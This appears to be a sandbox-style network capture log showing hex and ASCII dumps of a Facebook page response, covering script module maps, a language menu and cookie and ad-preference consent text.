                                                                                                                                                                                    2023-01-05 08:01:41 UTC20205INData Raw: 2c 22 2b 43 45 6a 62 42 79 22 2c 22 6c 2b 7a 59 45 30 73 22 2c 22 75 79 4c 4c 74 59 63 22 2c 22 65 33 64 79 57 61 46 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 54 61 67 54 6f 6b 65 6e 69 7a 65 72 22 3a 7b 22 72 22 3a 5b 22 72 72 6e 53 4d 64 39 22 2c 22 66 42 4e 79 7a 64 34 22 2c 22 75 5a 6e 59 6e 6a 41 22 2c 22 6d 30 7a 4c 6d 36 49 22 2c 22 74 75 65 37 4e 33 65 22 2c 22 6a 73 6b 46 6a 75 45 22 2c 22 2b 43 45 6a 62 42 79 22 2c 22 53 67 44 30 47 31 71 22 2c 22 70 49 30 59 6b 78 33 22 2c 22 30 43 4e 77 48 33 6f 22 2c 22 64 76 78 49 54 75 6f 22 2c 22 6c 2b 7a 59 45 30 73 22 2c 22 52 77 4e 47 46 74 38 22 2c 22 50 55 64 36 34 39 6b 22 2c 22 65 33 64 79 57 61 46 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45
                                                                                                                                                                                    Data Ascii: ,"+CEjbBy","l+zYE0s","uyLLtYc","e3dyWaF"],"be":1},"TagTokenizer":{"r":["rrnSMd9","fBNyzd4","uZnYnjA","m0zLm6I","tue7N3e","jskFjuE","+CEjbBy","SgD0G1q","pI0Ykx3","0CNwH3o","dvxITuo","l+zYE0s","RwNGFt8","PUd649k","e3dyWaF"],"rds":{"m":["FbtLogging","IntlQtE
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20206INData Raw: 59 22 2c 22 65 33 64 79 57 61 46 22 2c 22 4b 42 72 72 65 57 4d 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 65 39 41 4e 7a 77 5c 2f 22 2c 22 65 4d 6b 4d 78 48 5a 22 2c 22 74 74 58 70 77 70 52 22 2c 22 67 49 5a 67 73 58 6a 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 45 78 63 65 70 74 69 6f 6e 44 69 61 6c 6f 67 22 3a 7b 22 72 22 3a 5b 22 64 47 65 62 33 7a 49 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 72 72 6e 53 4d 64 39 22 2c 22 66 42 4e 79 7a 64 34 22 2c 22 75
                                                                                                                                                                                    Data Ascii: Y","e3dyWaF","KBrreWM","R5w1rCJ","e9ANzw\/","eMkMxHZ","ttXpwpR","gIZgsXj"],"rds":{"m":["FbtLogging","IntlQtEventFalcoEvent","Animation","PageTransitions","BanzaiScuba_DEPRECATED"]},"be":1},"ExceptionDialog":{"r":["dGeb3zI","R5w1rCJ","rrnSMd9","fBNyzd4","u
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20208INData Raw: 71 42 22 2c 22 30 49 42 7a 2b 48 70 22 2c 22 74 74 58 70 77 70 52 22 2c 22 67 49 5a 67 73 58 6a 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 46 6f 6f 74 65 72 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 52 35 77 31 72 43 4a 22 2c 22 66 42 4e 79 7a 64 34 22 2c 22 69 62 4e 44 63 63 78 22 2c 22 62 35 68 5c 2f 73 77 4c 22 2c 22 6a 73 6b 46 6a 75 45 22 2c 22 67 69 74 74 2b 6d 4b 22 2c 22 70 49 30 59 6b 78 33 22 2c 22 62 61 64 52 4b 71 42 22 2c 22 30 49 42 7a 2b 48 70 22 2c 22 74 74 58 70 77 70 52 22 2c 22 67 49 5a 67 73 58 6a 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 58 55 49 44 69 61 6c 6f 67 54 69 74 6c 65 2e 72 65 61 63 74 22 3a 7b 22 72 22 3a 5b 22 52 35 77 31 72 43 4a 22 2c 22 66 42 4e 79 7a 64 34 22 2c 22 69 62 4e 44 63 63 78 22 2c 22 62 35
                                                                                                                                                                                    Data Ascii: qB","0IBz+Hp","ttXpwpR","gIZgsXj"],"be":1},"XUIDialogFooter.react":{"r":["R5w1rCJ","fBNyzd4","ibNDccx","b5h\/swL","jskFjuE","gitt+mK","pI0Ykx3","badRKqB","0IBz+Hp","ttXpwpR","gIZgsXj"],"be":1},"XUIDialogTitle.react":{"r":["R5w1rCJ","fBNyzd4","ibNDccx","b5
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20209INData Raw: 70 6f 6c 69 63 79 22 3a 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 73 77 69 74 63 68 65 64 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69 63 79 22 3a 22 6f 72 69 67 69 6e 22 2c 22 6e 6f 6e 5f 6c 69 6e 6b 73 68 69 6d 5f 6c 6e 66 62 5f 6d 6f 64 65 22 3a 6e 75 6c 6c 2c 22 6c 69 6e 6b 5f 72 65 61 63 74 5f 64 65 66 61 75 6c 74 5f 68 61 73 68 22 3a 22 41 54 31 6a 36 33 6e 69 66 75 78 45 76 72 6a 46 56 77 39 52 6a 73 57 5f 43 56 59 71 74 6f 50 62 4a 43 32 61 64 64 69 4c 35 6a 35 74 77 4c 77 69 69 73 37 66 62 32 36 78 2d 66 68 72 33 70 4f 70 5f 43 6c 47 61 68 54 31 61 58 36 50 47 4f 33 67 49 4b 7a 68 51 38 66 4d 47 6e 73 6d 65 72 4c 71 46 56 4d 7a 32 75 51 34 67 38 37 48 62 38 41 70 57 64 30 64 6e 43 5f 52 61 34 74
                                                                                                                                                                                    Data Ascii: policy":"origin-when-crossorigin","switched_meta_referrer_policy":"origin","non_linkshim_lnfb_mode":null,"link_react_default_hash":"AT1j63nifuxEvrjFVw9RjsW_CVYqtoPbJC2addiL5j5twLwiis7fb26x-fhr3pOp_ClGahT1aX6PGO3gIKzhQ8fMGnsmerLqFVMz2uQ4g87Hb8ApWd0dnC_Ra4t
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20210INData Raw: 32 30 30 33 0d 0a 61 72 6d 31 2e 61 64 69 74 69 6f 6e 2e 63 6f 6d 22 2c 22 69 6c 6f 76 65 6d 79 66 72 65 65 64 6f 6d 73 2e 63 6f 6d 22 2c 22 73 65 63 75 72 65 2e 61 64 6e 78 73 2e 63 6f 6d 22 5d 2c 22 69 73 5f 6d 6f 62 69 6c 65 5f 64 65 76 69 63 65 22 3a 66 61 6c 73 65 7d 2c 32 37 5d 5d 2c 22 69 6e 73 74 61 6e 63 65 73 22 3a 5b 5b 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 59 7a 22 2c 5b 22 53 65 6c 65 63 74 61 62 6c 65 4d 65 6e 75 22 2c 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 30 5f 4e 42 22 2c 22 48 54 4d 4c 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 31 5f 58 77 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f
                                                                                                                                                                                    Data Ascii: 2003arm1.adition.com","ilovemyfreedoms.com","secure.adnxs.com"],"is_mobile_device":false},27]],"instances":[["__inst_02182015_0_0_Yz",["SelectableMenu","MenuSelectableItem","__markup_3310c079_0_0_NB","HTML","__markup_3310c079_0_1_Xw","__markup_3310c079_
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20212INData Raw: 22 76 61 6c 75 65 22 3a 22 64 65 5f 44 45 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 32 5f 6f 68 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 44 65 75 74 73 63 68 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 6e 5f 47 42 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65
                                                                                                                                                                                    Data Ascii: "value":"de_DE","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_2_oh"},"label":"Deutsch","title":"","className":"headerItem"},{"class":"headerItem","value":"en_GB","selected":false,"ctor":{"__m":"MenuSelectableIte
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20213INData Raw: 22 4d 61 67 79 61 72 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 6e 6c 5f 4e 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 68 72 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 4e 65 64 65 72 6c 61 6e 64 73 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72
                                                                                                                                                                                    Data Ascii: "Magyar","title":"","className":"headerItem"},{"class":"headerItem","value":"nl_NL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_a_hr"},"label":"Nederlands","title":"","className":"headerItem"},{"class":"header
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20215INData Raw: 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 68 5f 37 49 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 53 76 65 6e 73 6b 61 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 76 69 5f 56 4e 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 69 5f 52 78 22
                                                                                                                                                                                    Data Ascii: :"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_h_7I"},"label":"Svenska","title":"","className":"headerItem"},{"class":"headerItem","value":"vi_VN","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_i_Rx"
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20216INData Raw: 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6f 5f 59 46 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 36 32 37 5c 75 30 36 34 34 5c 75 30 36 33 39 5c 75 30 36 33 31 5c 75 30 36 32 38 5c 75 30 36 34 61 5c 75 30 36 32 39 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 68 69 5f 49 4e 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 70 5f 74 38 22 7d 2c 22 6c
                                                                                                                                                                                    Data Ascii: "__markup_3310c079_0_o_YF"},"label":"\u0627\u0644\u0639\u0631\u0628\u064a\u0629","title":"","className":"headerItem"},{"class":"headerItem","value":"hi_IN","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_p_t8"},"l
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20217INData Raw: 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 76 5f 6b 55 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 64 35 35 63 5c 75 61 64 36 64 5c 75 63 35 62 34 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 5d 2c 7b 22 69 64 22 3a 22 75 5f 30 5f 36 5f 51 78 22 2c 22 62 65 68 61 76 69 6f 72 73 22 3a 5b 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 57 69 74 68 53 71 75 61 72 65 43 6f 72 6e 65 72 22 7d 5d 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 5f 35 37 64 69 22 2c 22 6d 61 78 68 65 69 67 68 74 22 3a 35 30 30 2c 22 74 68 65 6d 65 22 3a 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 54 68 65 6d 65 22 7d 7d 5d 2c 33 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 5a 71 22 2c
                                                                                                                                                                                    Data Ascii: markup_3310c079_0_v_kU"},"label":"\ud55c\uad6d\uc5b4","title":"","className":"headerItem"}],{"id":"u_0_6_Qx","behaviors":[{"__m":"XUIMenuWithSquareCorner"}],"className":"_57di","maxheight":500,"theme":{"__m":"XUIMenuTheme"}}],3],["__inst_ead1e565_0_0_Zq",
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20219INData Raw: 6e 43 6f 6e 74 65 78 74 22 7d 5d 2c 7b 22 61 6c 69 67 6e 68 22 3a 22 6c 65 66 74 22 2c 22 70 6f 73 69 74 69 6f 6e 22 3a 22 62 65 6c 6f 77 22 7d 5d 2c 32 5d 5d 2c 22 6d 61 72 6b 75 70 22 3a 5b 5b 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 45 43 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 34 2d 69 32 20 5f 70 69 67 20 5f 39 6f 2d 63 20 5f 39 70 6c 6c 20 5f 35 30 66 34 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6c 32 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 61 69 73 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 36 61 20 75 69 50 6f 70 6f 76 65 72 5c 22 20 69 64 3d 5c 22 75 5f
                                                                                                                                                                                    Data Ascii: nContext"}],{"alignh":"left","position":"below"}],2]],"markup":[["__markup_9f5fac15_0_0_EC",{"__html":"\u003Cdiv>\u003Cdiv class=\"_4-i2 _pig _9o-c _9pll _50f4\">\u003Cdiv class=\"_9xl2\">\u003Cdiv class=\"_aisf\">\u003Cdiv class=\"_6a uiPopover\" id=\"u_
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20220INData Raw: 6f 64 75 63 74 73 20 66 6f 72 20 70 65 6f 70 6c 65 20 77 68 6f 20 68 61 76 65 20 61 6e 20 61 63 63 6f 75 6e 74 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 46 6f 72 20 61 64 76 65 72 74 69 73 69 6e 67 20 61 6e 64 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 73 65 72 76 69 63 65 73 20 6f 66 66 20 6f 66 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 61 6c 79 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65
                                                                                                                                                                                    Data Ascii: oducts for people who have an account\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003Cdiv>\u003Cdiv>For advertising and measurement services off of Meta Products, analytics, and to provide certain features and improve our se
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20222INData Raw: 65 74 61 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 61 6c 79 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65 72 76 69 63 65 73 20 66 6f 72 20 79 6f 75 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65 20 63 6f 6f 6b 69 65 73 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 70 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 39 5f 55 6a 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61
                                                                                                                                                                                    Data Ascii: eta Products, analytics, and to provide certain features and improve our services for you. These companies also use cookies.\u003C\/div>\u003C\/div>\u003Cp>\u003C\/p>\u003Cdiv class=\"_9vtg\" id=\"u_0_9_Uj\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expa
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20223INData Raw: 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6b 5c 22 3e 4f 74 68 65 72 20 77 61 79 73 20 79 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c
                                                                                                                                                                                    Data Ascii: /li>\u003C\/ul>\u003C\/p>\u003C\/div>\u003C\/p>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Other ways you can control your information\u003C\/p>\u003C\/div>\u003Cdiv>\
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20225INData Raw: 63 65 73 20 74 6f 20 64 65 74 65 72 6d 69 6e 65 20 77 68 69 63 68 20 61 64 73 20 79 6f 75 20 6d 61 79 20 62 65 20 69 6e 74 65 72 65 73 74 65 64 20 69 6e 20 73 65 65 69 6e 67 2e 20 59 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 74 68 69 73 20 69 6e 20 79 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 73 65 74 74 69 6e 67 73 5c 2f 61 64 73 5c 2f 5c 22 3e 61 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 70 72 65 66 65 72 65 6e 63 65 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59
                                                                                                                                                                                    Data Ascii: ces to determine which ads you may be interested in seeing. You can control this in your \u003Ca href=\"https:\/\/www.facebook.com\/settings\/ads\/\">ad settings\u003C\/a>.\u003C\/p>\u003Cp class=\"_9si-\">Ad preferences\u003C\/p>\u003Cp class=\"_9o-m\">Y
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20226INData Raw: 2d 31 34 20 73 78 5f 36 65 38 38 37 62 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 6f 70 74 20 6f 75 74 20 6f 66 20 73 65 65 69 6e 67 20 6f 6e 6c 69 6e 65 20 69 6e 74 65 72 65 73 74 2d 62 61 73 65 64 20 61 64 73 20 66 72 6f 6d 20 4d 65 74 61 20 61 6e 64 20 6f 74 68 65 72 20 70 61 72 74 69 63 69 70 61 74 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 74 68 72 6f 75 67 68 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22
                                                                                                                                                                                    Data Ascii: -14 sx_6e887b\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\">You can opt out of seeing online interest-based ads from Meta and other participating companies through the \u003Ca href=\"
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20228INData Raw: 31 33 20 6f 72 20 61 6e 20 65 61 72 6c 69 65 72 20 76 65 72 73 69 6f 6e 20 6f 66 20 69 4f 53 2e 20 50 6c 65 61 73 65 20 6e 6f 74 65 20 74 68 61 74 20 61 64 20 62 6c 6f 63 6b 65 72 73 20 61 6e 64 20 74 6f 6f 6c 73 20 74 68 61 74 20 72 65 73 74 72 69 63 74 20 6f 75 72 20 63 6f 6f 6b 69 65 20 75 73 65 20 6d 61 79 20 69 6e 74 65 72 66 65 72 65 20 77 69 74 68 20 74 68 65 73 65 20 63 6f 6e 74 72 6f 6c 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 54 68 65 20 61 64 76 65 72 74 69 73 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 77 65 20 77 6f 72 6b 20 77 69 74 68 20 67 65 6e 65 72 61 6c 6c 79 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 73 69 6d 69 6c 61 72 20 74 65 63 68 6e 6f 6c 6f 67 69 65 73 20
                                                                                                                                                                                    Data Ascii: 13 or an earlier version of iOS. Please note that ad blockers and tools that restrict our cookie use may interfere with these controls.\u003C\/p>\u003Cp class=\"_9o-m\">The advertising companies we work with generally use cookies and similar technologies
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20229INData Raw: 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 45 75 72 6f 70 65 61 6e 20 49 6e 74 65 72 61 63 74 69 76 65 20 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 63 5f 2b 55 5c 22 3e 5c 75 30 30 33 43
                                                                                                                                                                                    Data Ascii: g\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">European Interactive Digital Advertising Alliance\u003C\/a>\u003C\/li>\u003C\/ul>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_c_+U\">\u003C
                                                                                                                                                                                    2023-01-05 08:01:41 UTC20231INData Raw: 4f 2d 45 50 46 59 58 34 6a 77 6c 34 33 62 6c 4b 36 35 4f 47 33 59 70 39 37 59 36 50 50 62 69 67 73 39 53 69 38 4d 47 6e 7a 65 6b 52 41 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 73 75 70 70 6f 72 74 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 5c
